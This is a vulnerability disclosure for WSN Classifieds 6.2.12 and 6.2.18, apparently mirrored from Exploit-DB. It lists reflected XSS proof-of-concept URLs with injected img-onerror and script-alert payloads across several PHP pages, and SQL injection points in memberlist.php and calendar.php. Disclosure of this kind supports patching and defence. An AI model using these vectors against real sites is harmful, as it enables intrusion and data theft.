WSN Classifieds v.6.2.12 & 6.2.18 Multiple Vulnerabilities

vendor:

WSN Classifieds

by:

RandomStorm - Avram Marius Gabriel (d3v1l)

7.5

CVSS

HIGH

Cross-Site Scripting (XSS), SQL Injection

CWE

Product Name: WSN Classifieds

Affected Version From: 6.2.12

Affected Version To: 6.2.18

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested: Windows XP & Vista (IE9 - Firefox 8.0)

2011

WSN Classifieds v.6.2.12 & 6.2.18 Multiple Vulnerabilities

The WSN Classifieds script version 6.2.12 and 6.2.18 is vulnerable to multiple vulnerabilities including Cross-Site Scripting (XSS) and SQL Injection. The XSS vulnerability allows an attacker to inject malicious scripts into the application, potentially leading to unauthorized access or data theft. The SQL Injection vulnerability allows an attacker to manipulate database queries, potentially leading to unauthorized access or data leakage.

Mitigation:

To mitigate these vulnerabilities, it is recommended to update to the latest version of the WSN Classifieds script or apply any patches or security fixes provided by the vendor. Additionally, input validation and sanitization should be implemented to prevent XSS and SQL Injection attacks.

Source

Exploit-DB raw data:

################################################################################################


#  Exploit Title: WSN Classifieds v.6.2.12 & 6.2.18 Multiple Vulnerabilities    

#  Script Page : http://www.wsnclassifieds.com
   
#  Date: 1-12-2011

#  Author : RandomStorm  - http://www.randomstorm.com

#  Avram Marius Gabriel (d3v1l)

#  Tested on: Windows XP & Vista (IE9 - Firefox 8.0) 
 
#  Note: Redirect and Html Injection can be performed also 
 

################################################################################################ 
 
# Cross-Site Scripting (XSS) 

# XSS POC:  
 
# Vector:  "><img src="x:x" onerror="alert('XSS')">

# http://localhost/wsnclassifieds/suggest.php/58a2e"><img src="x:x" onerror="alert('XSS')">c6cc2cdff91 

# http://localhost/wsnclassifieds/sitemap.php/56218"><img src="x:x" onerror="alert('XSS')">d82e0881337

# http://localhost/wsnclassifieds/register.php/66eb5"><img src="x:x" onerror="alert('XSS')">090ab232720

# http://localhost/wsnclassifieds/leaders.php/68c0c"><img src="x:x" onerror="alert('XSS')">026a50f9084

# http://localhost/wsnclassifieds/index.php/d0c15"><img src="x:x" onerror="alert('XSS')">9086e589577

# http://localhost/wsnclassifieds/contactform.php/b3007"><img src="x:x" onerror="alert('XSS')">16aadfe1637


################################################################################################ 
 
# Vector:  "><script>alert(1)</script>
 
# http://localhost/wsnclassifieds/index.php?action=userlogin7375e"><script>alert(1)</script>87668222c12&filled=1

# http://localhost/wsnclassifieds/contactform.php?filled=11aefd"><script>alert(1)</script>6db4597a5ab

# http://localhost/wsnclassifieds/suggest.php?action=addcata5886"><script>alert(1)</script>e10802ab7a0&parent=1

# http://localhost/wsnclassifieds/suggest.php?action=addcat&parent=15b2f5"><script>alert(1)</script>9ade5081a20 
 

################################################################################################   


# Sql Injection 

# http://localhost/wsnclassifieds/memberlist.php?ascdesc=desc&field=name&perpage=(SQL)

################################################################################################ 


# Note: All Vulnerabilities work also on :

#  WSN Gallery - media gallery script
#  WSN KB - article directory script
#  WSN Forum - message board script
#  WSN Directory - business directory script
#  WSN Software Directory - software directory script
#  WSN Shop - storefront script 

# Some of it uses "calendar" so the Sql injection will be performed also from "calendar.php?yearID=2011&monthID=12&dayID=SQL"


################################################################################################